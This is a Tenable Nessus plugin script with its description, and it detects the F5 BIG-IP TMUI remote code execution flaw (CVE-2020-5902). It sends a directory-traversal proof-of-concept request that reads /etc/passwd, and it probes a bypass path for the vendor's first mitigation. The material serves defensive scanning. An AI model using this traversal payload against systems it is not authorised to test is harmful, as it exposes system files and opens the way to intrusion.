F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)

2020-07-06T00:00:00
ID F5_CVE-2020-5902.NASL
Type nessus
Reporter This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2020-07-06T00:00:00

Description

A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.

Note: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed. This plugin also tests for the bypass of that initial mitigation.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(138140);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/08/03");

  script_cve_id("CVE-2020-5902");
  script_xref(name:"IAVA", value:"2020-A-0283");

  script_name(english:"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)");

  script_set_attribute(attribute:"synopsis", value:
"BIG-IP Traffic Management User Interface Remote Code Execution.");
  script_set_attribute(attribute:"description", value:
"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the
Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute
arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.

Note: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.
This plugin also tests for the bypass of that initial mitigation.");
  script_set_attribute(attribute:"see_also", value:"https://support.f5.com/csp/article/K52145254");
  script_set_attribute(attribute:"solution", value:
"Upgrade to a version recommended in the vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-5902");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/07/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/07/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/07/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_analytics");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_domain_name_system");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_fraud_protection_service");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_global_traffic_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("bigip_web_detect.nasl");
  script_require_keys("installed_sw/F5 BIG-IP web management");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include('http.inc');
include('install_func.inc');

app = 'F5 BIG-IP web management';
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);
install = get_single_install(app_name:app, port:port);
passwd_pattern = "root:.*:0:[01]:";
poc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';
bypass_path = '/hsqldb;';

file = "/etc/passwd";
generic = FALSE;
line_limit = 10;

url = build_url(qs:"/", port:port);

res = http_send_recv3(
  method        : 'GET',
  port          : port,
  item          : poc_path,
  exit_on_fail  : TRUE
);

if (!egrep(pattern:passwd_pattern, string:res[2]))
{

  res = http_send_recv3(
    method        : 'GET',
    port          : port,
    item          : bypass_path,
    exit_on_fail  : TRUE
  );

  if('HSQL Database Engine Servlet'>< res[2])
  {
    output = chomp(res[2]);
    file = NULL;
    generic = TRUE;
    line_limit = 3;
  }
  else
    audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
}
else{
  output = str_replace(string:res[2], find:'\\n', replace:'\n');
}

security_report_v4(
  port        : port,
  severity    : SECURITY_HOLE,
  request     : make_list(http_last_sent_request()),
  file        : file,
  generic     : generic,
  output      : output,
  line_limit  : line_limit,
  attach_type : 'text/plain'
);